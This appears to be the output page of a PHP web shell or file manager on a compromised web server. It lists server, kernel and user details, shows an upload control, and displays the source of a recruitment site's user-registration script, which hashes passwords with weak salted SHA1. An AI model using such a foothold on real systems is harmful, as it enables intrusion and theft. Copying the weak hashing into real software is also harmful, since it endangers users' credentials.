HEX
Server: nginx/1.24.0
System: Linux webserver-one 6.8.0-101-generic #101-Ubuntu SMP PREEMPT_DYNAMIC Mon Feb 9 10:15:05 UTC 2026 x86_64
User: www-data (33)
PHP: 8.4.18
Disabled: NONE
$ pwd: /srv/www/rectt-csmcri.res.in/public_html/
Upload Files
File: /srv/www/rectt-csmcri.res.in/public_html/createuser.php
<?php
ob_start();
session_start();
include_once 'sites/config/config.php';

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Location: register.php');
    exit;
}
// Connect to server and select database using conn
// $conn = new conn($host, $username, $password, $db_name);
// if ($conn->connect_error) {
//     die("Connection failed: " . $conn->connect_error);
// }
// Define $myusername, $mypassword, and $myemail from POST request
$mypassword = $_POST['mypassword'];
$myemail = $_POST['myemail'];
$ad_id = $_POST['ad_id'];
$ad_id = $conn->real_escape_string($ad_id);
// To protect against MySQL injection
$mypassword = stripslashes($mypassword);
$myemail = stripslashes($myemail);
// Use prepared statements to prevent SQL injection
$mypassword = $conn->real_escape_string($mypassword);
$myemail = $conn->real_escape_string($myemail);
// Hash the password using SHA1 and a salt
$mypassword = sha1($mypassword . $salt);
// Check if email and ad_id combination already exists
$sql = "SELECT * FROM users WHERE email = ? AND ad_id = ?";
$stmt = $conn->prepare($sql);
$stmt->bind_param('si', $myemail, $ad_id);
$stmt->execute();
$result = $stmt->get_result();
$count = $result->num_rows;
if ($count != 0) {
    echo "<div class=\"alert alert-danger alert-dismissable\">
     <button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-hidden=\"true\">&times;</button>
     This email has already been used to apply for the selected advertisement.
     </div>";
    $stmt->close();
    $conn->close();
    exit();
} else {
    // Insert new user into the database
    // Note: created_at will be automatically set by MySQL's DEFAULT CURRENT_TIMESTAMP
    $sql = "INSERT INTO users (`password`, `email`, `ad_id`) VALUES (?, ?, ?)";
    $stmt = $conn->prepare($sql);
    $stmt->bind_param('ssi', $mypassword, $myemail, $ad_id);
    if ($stmt->execute()) {
        // Success
        // $_SESSION['password'] = $mypassword;
        $_SESSION['email'] = $myemail;
        $_SESSION['ad_id'] = $ad_id;
        $_SESSION['registration_success'] = "true";
        echo "true";
    } else {
        echo "<div class=\"alert alert-danger\">Failed to register user. Please try again later.</div>";
        // echo "Error: " . $stmt->error;
    }
}
// Close the connection
$stmt->close();
$conn->close();
ob_end_flush();
@ Telegram